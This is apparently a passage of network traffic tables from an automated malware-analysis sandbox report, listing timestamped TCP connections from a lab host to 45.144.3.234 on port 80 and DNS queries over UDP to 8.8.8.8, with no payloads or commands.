                                            Dec 2, 2020 11:54:28.641508102 CET4998280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:28.648578882 CET4998280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:28.704807997 CET804998245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:28.707230091 CET4998280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:28.759110928 CET804998245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:28.783734083 CET804998245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:28.783792973 CET804998245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:28.783899069 CET4998280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:28.783946037 CET4998280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:28.837847948 CET804998245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.036648035 CET4998380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.089318037 CET804998345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.089489937 CET4998380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.097569942 CET4998380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.151305914 CET804998345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.151492119 CET4998380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.203830004 CET804998345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.229926109 CET804998345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.229969978 CET804998345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.230189085 CET4998380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.230808973 CET4998380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.283245087 CET804998345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.420109034 CET4998480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.472805977 CET804998445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.473010063 CET4998480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.481369019 CET4998480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.534259081 CET804998445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.534396887 CET4998480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.588143110 CET804998445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.611299992 CET804998445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.611365080 CET804998445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.611449957 CET4998480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.611766100 CET4998480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.665082932 CET804998445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.826132059 CET4998580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.879309893 CET804998545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.879426956 CET4998580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.882165909 CET4998580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.940963030 CET804998545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:29.941138983 CET4998580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:29.994456053 CET804998545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.031088114 CET804998545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.031250954 CET804998545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.031282902 CET4998580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.031341076 CET4998580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.086510897 CET804998545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.210366964 CET4998680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.263504982 CET804998645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.263658047 CET4998680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.266581059 CET4998680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.319427967 CET804998645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.319520950 CET4998680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.372725010 CET804998645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.405565977 CET804998645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.405625105 CET804998645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.405689001 CET4998680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.405726910 CET4998680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.458914995 CET804998645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.631987095 CET4998780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.684592962 CET804998745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.684743881 CET4998780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.691282034 CET4998780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.743650913 CET804998745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.743802071 CET4998780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.796070099 CET804998745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.819380999 CET804998745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.819416046 CET804998745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:30.819607973 CET4998780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.819854021 CET4998780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:30.872123957 CET804998745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.014425993 CET4998880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.066649914 CET804998845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.066839933 CET4998880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.074450016 CET4998880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.137404919 CET804998845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.137681007 CET4998880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.190843105 CET804998845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.217477083 CET804998845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.217520952 CET804998845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.217650890 CET4998880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.217713118 CET4998880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.270041943 CET804998845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.469057083 CET4998980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.521732092 CET804998945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.521941900 CET4998980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.527811050 CET4998980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.580271006 CET804998945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.580452919 CET4998980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.633058071 CET804998945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.656363010 CET804998945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.656569958 CET4998980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.660242081 CET804998945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.660590887 CET4998980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.709132910 CET804998945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.912344933 CET4999080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.964144945 CET804999045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:31.964286089 CET4999080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:31.972079992 CET4999080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.023731947 CET804999045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.023840904 CET4999080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.076621056 CET804999045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.100903034 CET804999045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.100934029 CET804999045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.101026058 CET4999080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.101170063 CET4999080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.152640104 CET804999045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.370079041 CET4999180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.422111034 CET804999145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.422338009 CET4999180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.430896997 CET4999180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.483027935 CET804999145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.483166933 CET4999180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.537128925 CET804999145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.565126896 CET804999145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.565166950 CET804999145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.565375090 CET4999180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.565404892 CET4999180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.617245913 CET804999145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.828113079 CET4999280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.882344961 CET804999245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.882460117 CET4999280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.886878967 CET4999280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.939182043 CET804999245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:32.939291000 CET4999280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:32.991450071 CET804999245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.011949062 CET804999245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.012001038 CET804999245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.012119055 CET4999280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.012162924 CET4999280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.064338923 CET804999245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.264466047 CET4999380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.317218065 CET804999345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.317337990 CET4999380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.320496082 CET4999380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.373455048 CET804999345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.374996901 CET4999380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.427756071 CET804999345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.450376034 CET804999345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.450431108 CET804999345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.450563908 CET4999380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.450640917 CET4999380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.509260893 CET804999345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.698182106 CET4999480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.750164032 CET804999445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.750371933 CET4999480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.753309965 CET4999480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.805006981 CET804999445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.805074930 CET4999480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.858300924 CET804999445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.881656885 CET804999445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.881697893 CET804999445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:33.881815910 CET4999480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.881918907 CET4999480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:33.933936119 CET804999445.144.3.234192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 2, 2020 11:52:27.169116020 CET4944853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:27.196607113 CET53494488.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:27.898998022 CET6034253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:27.926183939 CET53603428.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:28.603327990 CET6134653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:28.630386114 CET53613468.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:41.218013048 CET5177453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:41.355474949 CET53517748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:41.767638922 CET5602353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:41.803246975 CET53560238.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:42.105349064 CET5838453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:42.132451057 CET53583848.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:42.570950985 CET6026153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:42.606357098 CET53602618.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:43.039609909 CET5606153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:43.162781000 CET53560618.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:43.673294067 CET5833653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:43.713635921 CET53583368.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:44.272181034 CET5378153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:44.310158968 CET53537818.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:44.558691025 CET5406453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:44.585738897 CET53540648.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:44.716902018 CET5281153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:44.752568007 CET53528118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:45.576247931 CET5529953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:45.611747026 CET53552998.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:46.081265926 CET6374553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:46.116872072 CET53637458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:47.086719990 CET5005553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:47.122234106 CET53500558.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:47.525657892 CET6137453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:47.561136961 CET53613748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:47.956501961 CET5033953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:47.991945982 CET53503398.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:48.383275032 CET6330753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:48.418570042 CET53633078.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:48.786987066 CET4969453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:48.822575092 CET53496948.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:49.203802109 CET5498253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:49.230813026 CET53549828.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:49.659370899 CET5001053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:49.694818020 CET53500108.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:50.093799114 CET6371853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:50.129313946 CET53637188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:50.534687996 CET6211653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:50.570329905 CET53621168.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:50.974617958 CET6381653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:51.013034105 CET53638168.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:51.391402960 CET5501453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:51.431253910 CET53550148.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:51.891607046 CET6220853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:51.927218914 CET53622088.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:52.391201973 CET5757453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:52.426688910 CET53575748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:52.787806034 CET5181853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:52.823009968 CET53518188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:52.922101974 CET5662853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:52.949182034 CET53566288.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:53.241023064 CET6077853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:53.268198013 CET53607788.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:53.685561895 CET5379953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:53.721225977 CET53537998.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:54.084891081 CET5468353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:54.120260954 CET53546838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:54.560220957 CET5932953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:54.600783110 CET53593298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:55.011075020 CET6402153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:55.046402931 CET53640218.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:55.415225983 CET5612953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:55.442281961 CET53561298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:55.873862982 CET5817753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:55.909446955 CET53581778.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:56.396317005 CET5070053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:56.431663990 CET53507008.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:56.770127058 CET5406953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:56.798049927 CET53540698.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:57.169342041 CET6117853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:57.196469069 CET53611788.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:57.657506943 CET5701753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:57.684812069 CET53570178.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:58.035134077 CET5632753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:58.062277079 CET53563278.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:58.479775906 CET5024353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:58.515727043 CET53502438.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:58.879780054 CET6205553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:58.907005072 CET53620558.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:59.275832891 CET6124953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:59.302881002 CET53612498.8.8.8192.168.2.6
                                            Dec 2, 2020 11:52:59.678181887 CET6525253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:52:59.713706970 CET53652528.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:00.166532040 CET6436753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:00.193737030 CET53643678.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:00.558366060 CET5506653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:00.585374117 CET53550668.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:00.962841988 CET6021153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:00.989985943 CET53602118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:01.440953970 CET5657053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:01.478122950 CET53565708.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:01.910465002 CET5845453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:01.946038008 CET53584548.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:02.286391020 CET5518053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:02.313791037 CET53551808.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:02.878704071 CET5872153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:02.905879974 CET53587218.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:03.308295965 CET5769153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:03.335556984 CET53576918.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:04.113468885 CET5294353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:04.140631914 CET53529438.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:05.247956038 CET5948953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:05.283634901 CET53594898.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:05.641532898 CET6402253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:05.682204008 CET53640228.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:06.013871908 CET6002353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:06.049491882 CET53600238.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:06.460585117 CET5719353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:06.496139050 CET53571938.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:06.890744925 CET5024853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:06.926450968 CET53502488.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:07.282875061 CET6441353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:07.309964895 CET53644138.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:07.757424116 CET6042953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:07.784583092 CET53604298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:08.224451065 CET6034553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:09.288620949 CET6034553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:10.121442080 CET53603458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:10.472949982 CET5873053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:10.508510113 CET53587308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:10.939058065 CET5383053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:10.966033936 CET53538308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:11.357434034 CET5722653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:11.392880917 CET53572268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:11.856349945 CET5788053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:11.883450985 CET53578808.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:11.992330074 CET6085053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.032121897 CET53608508.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:12.288547993 CET5318753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.324453115 CET53531878.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:12.675846100 CET5583053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.711486101 CET53558308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:12.740447044 CET5514553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:12.767549038 CET53551458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.154231071 CET6409153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.194992065 CET53640918.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.244995117 CET5572853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.280430079 CET53557288.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.602885008 CET5569453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.630021095 CET53556948.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.651527882 CET5392653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.664628983 CET6553153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.682809114 CET6543753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:13.703391075 CET53539268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.705343008 CET53655318.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:13.718343019 CET53654378.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.028386116 CET5459053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.055421114 CET53545908.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.091432095 CET5131853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.127091885 CET53513188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.418385029 CET6088853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.445549011 CET53608888.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.534579992 CET5847453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.570110083 CET53584748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:14.831980944 CET6457553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:14.859060049 CET53645758.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.003618956 CET5909253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.039313078 CET53590928.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.284384966 CET5748353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.320094109 CET53574838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.406582117 CET5383053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.446218014 CET53538308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.667623997 CET4980953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.678807020 CET5281453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:15.703068018 CET53498098.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:15.714591026 CET53528148.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.030819893 CET5106953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.066318989 CET53510698.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.391937971 CET5652653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.411999941 CET5051253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.427628994 CET53565268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.439069986 CET53505128.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.780730963 CET5167953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.807925940 CET53516798.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:16.841665030 CET5607153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:16.876996994 CET53560718.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.151694059 CET5895053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.187235117 CET53589508.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.223705053 CET5703553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.250780106 CET53570358.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.514981985 CET5412253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.555629969 CET53541228.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:17.903167009 CET5675953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.956578970 CET5922053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:17.992027998 CET53592208.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:18.336477995 CET6221153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:18.363548040 CET53622118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:18.710259914 CET6203353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:18.737206936 CET53620338.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:18.912590981 CET5675953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:18.939637899 CET53567598.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:19.234713078 CET6124453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:19.261743069 CET53612448.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:19.627461910 CET5369653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:19.654512882 CET53536968.8.8.8192.168.2.6
